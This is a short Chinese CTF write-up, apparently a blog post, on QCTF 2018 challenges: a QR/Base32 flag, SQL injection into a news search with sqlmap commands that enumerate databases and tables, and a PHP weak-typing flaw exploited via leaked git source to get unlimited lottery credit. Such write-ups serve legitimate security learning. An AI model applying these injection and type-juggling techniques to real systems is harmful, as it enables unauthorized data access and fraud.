QCTF 2018 misc和web签到题 writeup

本文解析了一次CTF竞赛中的两个挑战。首先,通过解码二维码并使用Base32解码技术,揭示了一个隐藏的flag。其次,深入探讨了Web注入攻击,利用SQLmap工具发现了数据库中的敏感信息,包括一个flag。此外,还介绍了如何利用Git代码泄露和弱类型漏洞无限刷取彩票,最终获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、misc

X-man-A face

 

用画图编辑补全二维码如下

用微信扫码得到

KFBVIRT3KBZGK5DUPFPVG2LTORSXEX2XNBXV6QTVPFZV6TLFL5GG6YTTORSXE7I=

 

用python的base32解码得到答案QCTF{Pretty_Sister_Who_Buys_Me_Lobster}

 

二、 web

1.NewsCenter

页面搜索post提交的地方有注入点用sqlmap跑下

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql --current-db   查询当前数据库

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql -D news –tables    查询news数据库有几张表

 

sqlmap -u "http://47.96.118.255:33066/"--data="search=the" --dbms mysql -D news -T secret_table –columns  查询secret_table表字段内容出现flag

 

2. Lottery

用awvs扫描站点发现存在git代码泄露

 

https://github.com/lijiejie/GitHack  利用脚本下载源码

在 api.php 85行number传入参数没有判断 第 89 行处找到 弱类型 漏洞。

用burp构造号码全是 True 就可以无限刷了,刷到1000万购买flag

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值